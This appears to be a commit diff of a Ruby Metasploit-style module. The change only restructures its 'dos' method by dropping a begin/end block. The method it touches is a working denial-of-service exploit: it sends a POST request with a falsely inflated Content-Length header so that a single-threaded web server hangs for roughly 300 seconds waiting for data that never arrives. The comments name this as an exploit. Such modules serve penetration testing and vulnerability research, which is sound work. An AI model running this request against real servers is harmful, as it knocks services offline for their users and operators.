@@ -41,28 +41,26 @@ def is_alive?
41
41
def dos
42
42
# The web server is single threaded, and when the content length is longer than the data, it will continue to wait
43
43
# for the rest of the data, which never comes, and times out after ~300 seconds.
44
- begin
45
- data = Rex ::Text . rand_text_alphanumeric ( 40 )
46
- send_request_cgi ( {
47
- 'method' => 'POST' ,
48
- 'uri' => '/' ,
49
- 'data' => data , #'asdasdasdasdasdasdasd',
50
- 'headers' => {
51
- # These are kept here since they were in the original exploit, however they are not required
52
- #'Host' => 'asdasdasd',
53
- #'User-Agent' => 'asdasdasd',
54
- #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
55
- #'Accept-Language' => 'en-US,en;q=0.5',
56
- #'Referer' => 'asdasdasdasd',
57
- #'Connection' => 'close',
58
- #'Upgrade-Insecure-Requests' => 1,
59
- #'Content-Type' => 'application/x-www-form-urlencoded',
60
- 'Content-Length' => data . length + rand ( 10 ) + 10 #42
61
- }
62
- } )
44
+ data = Rex ::Text . rand_text_alphanumeric ( 40 )
45
+ send_request_cgi ( {
46
+ 'method' => 'POST' ,
47
+ 'uri' => '/' ,
48
+ 'data' => data , #'asdasdasdasdasdasdasd',
49
+ 'headers' => {
50
+ # These are kept here since they were in the original exploit, however they are not required
51
+ #'Host' => 'asdasdasd',
52
+ #'User-Agent' => 'asdasdasd',
53
+ #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
54
+ #'Accept-Language' => 'en-US,en;q=0.5',
55
+ #'Referer' => 'asdasdasdasd',
56
+ #'Connection' => 'close',
57
+ #'Upgrade-Insecure-Requests' => 1,
58
+ #'Content-Type' => 'application/x-www-form-urlencoded',
59
+ 'Content-Length' => data . length + rand ( 10 ) + 10 #42
60
+ }
61
+ } )
63
62
rescue ::Rex ::ConnectionRefused , ::Rex ::HostUnreachable , ::Rex ::ConnectionTimeout , ::Timeout ::Error , ::Errno ::EPIPE
64
63
print_error ( "Couldn't connect to #{ peer } " )
65
- end
66
64
end
67
65
68
66
def run
0 commit comments